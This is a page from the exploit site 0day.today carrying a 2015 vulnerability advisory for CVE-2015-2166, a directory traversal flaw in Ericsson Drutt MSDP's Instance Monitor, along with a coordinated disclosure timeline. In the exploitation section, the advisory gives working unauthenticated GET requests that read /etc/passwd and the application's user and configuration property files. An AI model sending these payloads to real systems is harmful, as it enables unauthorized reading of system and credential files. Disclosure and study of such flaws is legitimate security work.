0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
+------------------------------------------------------------------------------------------------------+ + Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access + +------------------------------------------------------------------------------------------------------+ Affected Product: Ericsson Drutt MSDP (Instance Monitor) Vendor Homepage : www.ericsson.com Version : 4, 5 and 6 CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N CVE : CVE-2015-2166 Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] Patched : Yes +-------------+ + Description + +-------------+ Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system. +----------------------+ + Exploitation Details + +----------------------+ This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s): http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 12.Mar.2015 - Patches released 31.Mar.2015 - Public disclosure # 0day.today [2024-11-16] #